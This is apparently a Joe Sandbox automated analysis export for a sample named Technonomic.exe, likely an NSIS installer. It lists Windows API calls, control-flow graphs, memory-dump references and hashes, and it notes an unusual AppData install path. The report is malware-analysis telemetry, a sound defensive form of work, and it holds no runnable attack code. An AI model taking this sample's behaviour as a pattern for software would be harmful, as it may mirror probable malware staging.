                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                      • Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                                                                                      • Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
                                                                                                                                                                      • Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                                                                                      • Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 689 406050-406082 RegOpenKeyExW 690 4060c4-4060c7 689->690 691 406084-4060a3 RegQueryValueExW 689->691 692 4060b1 691->692 693 4060a5-4060a9 691->693 694 4060b4-4060be RegCloseKey 692->694 693->694 695 4060ab-4060af 693->695 694->690 695->692 695->694
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040607A
                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040609B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060BE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID: : Completed
                                                                                                                                                                      • API String ID: 3677997916-2954849223
                                                                                                                                                                      • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                      • Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
                                                                                                                                                                      • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 696 405d87-405d93 697 405d94-405dc8 GetTickCount GetTempFileNameW 696->697 698 405dd7-405dd9 697->698 699 405dca-405dcc 697->699 701 405dd1-405dd4 698->701 699->697 700 405dce 699->700 700->701
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405DA5
                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405DC0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                      • API String ID: 1716503409-2113348990
                                                                                                                                                                      • Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                                                                                      • Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
                                                                                                                                                                      • Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                                                                                      • Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 702 4064ed-40650d GetSystemDirectoryW 703 406511-406513 702->703 704 40650f 702->704 705 406524-406526 703->705 706 406515-40651e 703->706 704->703 708 406527-406556 wsprintfW LoadLibraryW 705->708 706->705 707 406520-406522 706->707 707->708
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                                                                                      • wsprintfW.USER32 ref: 0040653F
                                                                                                                                                                      • LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                      • String ID: %s%S.dll
                                                                                                                                                                      • API String ID: 2200240437-2744773210
                                                                                                                                                                      • Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                                                                                      • Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
                                                                                                                                                                      • Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                                                                                      • Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                                        • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                                                        • Part of subcall function 00405863: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                                                                                        • Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3585118688-0
                                                                                                                                                                      • Opcode ID: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
                                                                                                                                                                      • Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
                                                                                                                                                                      • Opcode Fuzzy Hash: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
                                                                                                                                                                      • Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405BF0
                                                                                                                                                                        • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                                                                                        • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                                                        • Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?,00000000,000000F0), ref: 00401645
                                                                                                                                                                      Strings
                                                                                                                                                                      • C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 00401638
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable
                                                                                                                                                                      • API String ID: 1892508949-550679374
                                                                                                                                                                      • Opcode ID: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
                                                                                                                                                                      • Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
                                                                                                                                                                      • Opcode Fuzzy Hash: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
                                                                                                                                                                      • Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                                                                        • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405BF0
                                                                                                                                                                        • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                                                                                        • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                                                                                      • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405C98
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0), ref: 00405CA8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                      • String ID: P_B
                                                                                                                                                                      • API String ID: 3248276644-906794629
                                                                                                                                                                      • Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                                                                                      • Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
                                                                                                                                                                      • Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                                                                                      • Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                                                                                      • CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                                                                                      Strings
                                                                                                                                                                      • Error launching installer, xrefs: 00405876
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                      • Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                                                                                      • Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
                                                                                                                                                                      • Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                                                                                      • Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                                                                                      • Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                                                                                      • Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
